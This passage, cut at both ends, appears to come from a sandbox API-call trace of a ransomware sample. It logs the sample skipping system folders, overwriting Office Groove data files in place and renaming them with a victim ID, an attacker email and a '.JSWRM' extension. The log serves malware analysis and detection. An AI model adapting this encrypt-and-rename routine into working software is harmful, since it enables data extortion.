lpWideCharStr="CommsIncomingImageMask.bmp", cchWideChar=26, lpMultiByteStr=0x2410d8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommsIncomingImageMask.bmp", lpUsedDefaultChar=0x0) returned 26 [0131.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0131.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2471d0 [0131.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0131.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2472c8 [0131.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsincomingimagemask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.391] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=2520) returned 1 [0131.391] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9d0) returned 0x20c6c0 [0131.391] ReadFile (in: hFile=0x264, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9d0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345de64*=0x9d0, lpOverlapped=0x0) returned 1 [0131.392] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.392] WriteFile (in: hFile=0x264, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9d0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345de60*=0x9d0, lpOverlapped=0x0) returned 1 [0131.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0131.393] CloseHandle (hObject=0x264) returned 1 [0131.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2474b8 [0131.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0131.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0131.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0131.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0131.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0131.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0131.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0131.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0131.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0131.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247a88 [0131.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0131.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0131.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0131.393] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsincomingimagemask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsincomingimagemask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0131.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0131.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0131.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0131.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0131.397] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19817013, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19817013, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1983d259, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x630, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="CommsIncomingImageMaskSmall.bmp", cAlternateFileName="COMMSI~2.BMP")) returned 1 [0131.398] lstrcmpiW (lpString1="CommsIncomingImageMaskSmall.bmp", lpString2=".") returned 1 [0131.398] lstrcmpiW (lpString1="CommsIncomingImageMaskSmall.bmp", lpString2="..") returned 1 [0131.398] lstrcmpiW (lpString1="CommsIncomingImageMaskSmall.bmp", lpString2="...") returned 1 [0131.398] lstrcmpiW (lpString1="CommsIncomingImageMaskSmall.bmp", lpString2="windows") returned -1 [0131.398] lstrcmpiW (lpString1="CommsIncomingImageMaskSmall.bmp", lpString2="recovery") returned -1 [0131.398] lstrcmpiW (lpString1="CommsIncomingImageMaskSmall.bmp", lpString2="perflogs") returned -1 [0131.398] lstrcmpiW (lpString1="CommsIncomingImageMaskSmall.bmp", lpString2="documents and settings") returned -1 [0131.398] lstrcmpiW (lpString1="CommsIncomingImageMaskSmall.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.398] lstrcmpiW (lpString1="CommsIncomingImageMaskSmall.bmp", lpString2="system volume information") returned -1 [0131.398] lstrcmpiW (lpString1="CommsIncomingImageMaskSmall.bmp", lpString2="msocache") returned -1 [0131.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0131.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsIncomingImageMaskSmall.bmp", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0131.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0131.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsIncomingImageMaskSmall.bmp", cchWideChar=31, lpMultiByteStr=0x241308, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommsIncomingImageMaskSmall.bmp", lpUsedDefaultChar=0x0) returned 31 [0131.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0131.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0131.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsIncomingImageMaskSmall.bmp", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0131.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0131.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsIncomingImageMaskSmall.bmp", cchWideChar=31, lpMultiByteStr=0x240f48, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommsIncomingImageMaskSmall.bmp", lpUsedDefaultChar=0x0) returned 31 [0131.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0131.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2472c8 [0131.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0131.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2474b8 [0131.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageMaskSmall.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsincomingimagemasksmall.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.399] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=1584) returned 1 [0131.399] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x630) returned 0x2332c0 [0131.399] ReadFile (in: hFile=0x264, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x630, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345de64*=0x630, lpOverlapped=0x0) returned 1 [0131.401] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.401] WriteFile (in: hFile=0x264, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345de60*=0x630, lpOverlapped=0x0) returned 1 [0131.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0131.401] CloseHandle (hObject=0x264) returned 1 [0131.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2475b0 [0131.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0131.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0131.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0131.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0131.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0131.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0131.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0131.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0131.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0131.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0131.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17e) returned 0x201568 [0131.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0131.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0131.401] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageMaskSmall.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsincomingimagemasksmall.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageMaskSmall.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsincomingimagemasksmall.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x201568 | out: hHeap=0x1e0000) returned 1 [0131.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0131.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0131.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0131.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0131.402] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19817013, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19817013, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1de3, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="CommsIncomingImageSmall.jpg", cAlternateFileName="COMMSI~2.JPG")) returned 1 [0131.402] lstrcmpiW (lpString1="CommsIncomingImageSmall.jpg", lpString2=".") returned 1 [0131.403] lstrcmpiW (lpString1="CommsIncomingImageSmall.jpg", lpString2="..") returned 1 [0131.403] lstrcmpiW (lpString1="CommsIncomingImageSmall.jpg", lpString2="...") returned 1 [0131.403] lstrcmpiW (lpString1="CommsIncomingImageSmall.jpg", lpString2="windows") returned -1 [0131.403] lstrcmpiW (lpString1="CommsIncomingImageSmall.jpg", lpString2="recovery") returned -1 [0131.403] lstrcmpiW (lpString1="CommsIncomingImageSmall.jpg", lpString2="perflogs") returned -1 [0131.403] lstrcmpiW (lpString1="CommsIncomingImageSmall.jpg", lpString2="documents and settings") returned -1 [0131.403] lstrcmpiW (lpString1="CommsIncomingImageSmall.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.403] lstrcmpiW (lpString1="CommsIncomingImageSmall.jpg", lpString2="system volume information") returned -1 [0131.403] lstrcmpiW (lpString1="CommsIncomingImageSmall.jpg", lpString2="msocache") returned -1 [0131.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0131.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsIncomingImageSmall.jpg", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0131.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0131.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsIncomingImageSmall.jpg", cchWideChar=27, lpMultiByteStr=0x2411f0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommsIncomingImageSmall.jpg", lpUsedDefaultChar=0x0) returned 27 [0131.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0131.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0131.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsIncomingImageSmall.jpg", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0131.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0131.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsIncomingImageSmall.jpg", cchWideChar=27, lpMultiByteStr=0x2413d0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommsIncomingImageSmall.jpg", lpUsedDefaultChar=0x0) returned 27 [0131.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0131.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247e68 [0131.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0131.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2476a8 [0131.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageSmall.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsincomingimagesmall.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.404] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=7651) returned 1 [0131.404] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1de0) returned 0x27b348 [0131.404] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1de0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x1de0, lpOverlapped=0x0) returned 1 [0131.406] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.406] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1de0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x1de0, lpOverlapped=0x0) returned 1 [0131.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0131.406] CloseHandle (hObject=0x264) returned 1 [0131.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247a88 [0131.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0131.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0131.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0131.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0131.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0131.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0131.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0131.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0131.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0131.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247898 [0131.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0131.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0131.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0131.407] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageSmall.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsincomingimagesmall.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageSmall.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsincomingimagesmall.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0131.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0131.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0131.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0131.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0131.409] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1983d259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1983d259, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x22c0, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="CommsOutgoingImage.jpg", cAlternateFileName="COMMSO~1.JPG")) returned 1 [0131.409] lstrcmpiW (lpString1="CommsOutgoingImage.jpg", lpString2=".") returned 1 [0131.409] lstrcmpiW (lpString1="CommsOutgoingImage.jpg", lpString2="..") returned 1 [0131.409] lstrcmpiW (lpString1="CommsOutgoingImage.jpg", lpString2="...") returned 1 [0131.409] lstrcmpiW (lpString1="CommsOutgoingImage.jpg", lpString2="windows") returned -1 [0131.409] lstrcmpiW (lpString1="CommsOutgoingImage.jpg", lpString2="recovery") returned -1 [0131.409] lstrcmpiW (lpString1="CommsOutgoingImage.jpg", lpString2="perflogs") returned -1 [0131.409] lstrcmpiW (lpString1="CommsOutgoingImage.jpg", lpString2="documents and settings") returned -1 [0131.409] lstrcmpiW (lpString1="CommsOutgoingImage.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.409] lstrcmpiW (lpString1="CommsOutgoingImage.jpg", lpString2="system volume information") returned -1 [0131.409] lstrcmpiW (lpString1="CommsOutgoingImage.jpg", lpString2="msocache") returned -1 [0131.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0131.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsOutgoingImage.jpg", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0131.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0131.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsOutgoingImage.jpg", cchWideChar=22, lpMultiByteStr=0x240fc0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommsOutgoingImage.jpg", lpUsedDefaultChar=0x0) returned 22 [0131.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0131.409] RtlAllocateHeap 